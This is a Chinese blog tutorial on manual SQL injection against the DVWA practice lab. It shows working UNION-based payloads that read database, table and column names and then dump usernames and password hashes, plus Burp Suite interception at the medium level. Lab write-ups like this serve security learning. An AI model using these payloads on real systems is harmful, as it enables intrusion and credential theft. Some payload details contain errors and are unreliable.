DVWA-SQL手工注入

最新推荐文章于 2024-05-12 12:02:22 发布
最新推荐文章于 2024-05-12 12:02:22 发布
阅读量1.9k 收藏 48
点赞数 23
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80164634/article/details/136014017
版权
本文详细介绍了SQL手动注入的过程,包括如何识别注入点、使用符号判断字段、通过SQL语句获取数据库信息,以及在实际应用中如何使用Burpsuite工具进行检测和防御。作者还讨论了DVWA环境中的安全设置,以及不同难度级别的SQL注入挑战。
摘要由CSDN通过智能技术生成

SQL手工注入

【来自百度】—SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。

解题简述

1->low;

首先在表单中输入1,如下图正常结果显示
在这里插入图片描述
输入2,在这里插入图片描述依旧正常,这里可以选择去检查源代码,
在这里插入图片描述
在这里插入图片描述查看源代码可知这一关对于表单输入ID没有进行任何过滤(这点目前我也不太理解,不过没啥影响目前)
往下走—开始进行注入点判断,
输入【1’and 1 = 1】或【1’】
发现报错-You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘and1=1’’ at line 1(这个截屏不好看,不截了)
由上可知受到单引号闭合影响

语句1’ or 1=1#可以查出所有ID内容
这里了解
在这里插入图片描述
找出注入点问题以及符号问题,然后判断字段(就是正常查询时可以显示用户的几条信息)
输入【1‘and1=1order by 1#】
在这里插入图片描述
输入1’ and 1=1 order by 2#,与上同
但是,当输入1’ and 1=1 order by 3#时
在这里插入图片描述
返回错误,故,就有俩个字段,
现在,开始对内容的信息查询
顺序首先是数据库名,表名,列名,之后是具体信息
-1’ union select 1,database() #
在这里插入图片描述
1’ union select 1,database() #
在这里插入图片描述
得到数据库名->dvwa
语句是-1’ union select 1,table_name from information_schema.tables where table_schema=’dvwa’#(dvwa是根据上一个图查出来的数据库名字)

也可以用group_concat把表名拼接起来
-1’ union select 1, group_concat(table_name) from information_schema.tables where table_schema=’dvwa’#
在这里插入图片描述查完表名,查列名,语句是-1’ union select 1, group_concat(column_names) from information_schema.columns where table_name=’users’#
在这里插入图片描述
列名之后就可以查自己想查的
语句是:-1’ union select group_concat(user_id,first_name),group_concat(user,password) from users#

2->Medium;

在这里插入图片描述
使用工具——burpsuite,
打开burp,导入证书
这里说一下,我习惯用Microsoft edge,这里需要用到火狐代理,所以更改浏览器(是你运行DVWA的浏览器)
进行抓包,这里我的bp有了些问题,完了重下个,这里就引用一下一些查找的截屏。
在这里插入图片描述在这里插入图片描述
在数据包中会找到我们提交的ID,这里的ID的位置就是我们可以利用的注入位置,之后的步骤就跟上面一模一样,以下就是简单的演示。
在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
欧克了,

3->high

在这里插入图片描述跳转界面,在另一个界面输入注入语句。
1’or1=1#
在这里插入图片描述
这个检查源代码,有limit限制只能输出一条,
这里看一些题解,-——主要是为了防止SQLmap注入,不太理解,之后完了再学

4->Impossible

先检查一下源代码在这里插入图片描述
嗯—不太理解
这里给出我参考,学习中的一篇比较好一篇DVWA-1.9教程之sql

Siebel.
关注
  • 23
    点赞
  • 48
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWASQL手工注入
编程界菜姬的博客
06-02 1233
1.注入思路1.判断是否存在注入注入的类型是字符型、数字型还是搜索型2.猜解 SQL 查询语句中的字段数3.确定显示的字段顺序4.获取当前数据库5.获取数据库中的表6.获取表中的字段名7.查询 ...
DVWA SQL注入手工注入
马赛克的博客
03-21 3579
本次使用的靶机是看雪论坛为我们提供的在线靶机 地址:http://43.247.91.228:81 账号:admin 密码:password 一:Low级别注入 1. 先在文本框中输入1,单击submit,查看效果 手注的思路:确定页面使用了多少个字段,然后确定各个字段的位置,最后构造SQL语句进行注入 2. 在文本框中输入 1' order by 2#返回正常 1...
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 1139
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
DVWA SQL注入
m0_55605024的博客
03-01 498
简而言之,是在输入字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些。如:将'dvwa'替换为database() or 替换为0x64767761(将'dvwa'进行16进制编码)2.安装kali操作系统,kali自带sqlmap,可以直接输入sqlmap执行。注入进去的恶意指令就会被数据库误以为是正常的SQL指令而运行。--dbs:database serve 获取所有的数据库名。database():返回当前数据库的名称。防御命令执行的最高效的方法,就是。
网络渗透测试实验3:SQL注入DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1823
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
DVWA通过攻略之SQL注入
勿山几已
05-24 8540
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWASQL注入
热门推荐
qq_58091216的博客
05-01 2万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
DVWA——SQL注入
qq_62803993的博客
01-08 2440
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
DVWA-------简单的SQL注入
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
DVWA靶场中SQL注入
剁椒鱼头没剁椒的博客
12-13 5977
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
4. 使用MySQL创建一个新的数据库,通常命名为"dvwa",并导入"DVWA-master"文件夹中的SQL脚本来填充数据库。这些脚本通常在"data"或"sql"子目录下。 5. 在浏览器中访问"http://localhost/DVWA"(或根据你的PHPstudy...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 5837
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
dvwa——sql注入
GZY0601的博客
09-16 597
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库
DVWA-SQL注入
acdcccc的博客
08-26 311
分享DVWA靶场的SQL注入过程
dvwa手工SQL注入
最新发布
06-26
DVWA(Damn Vulnerable Web Application)是一个非常流行的开源Web应用程序,专用于教育和演示安全漏洞,包括SQL注入。手动SQL注入是一种常见的攻击手段,当用户输入的数据被直接插入到SQL查询中,而没有适当的过滤...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值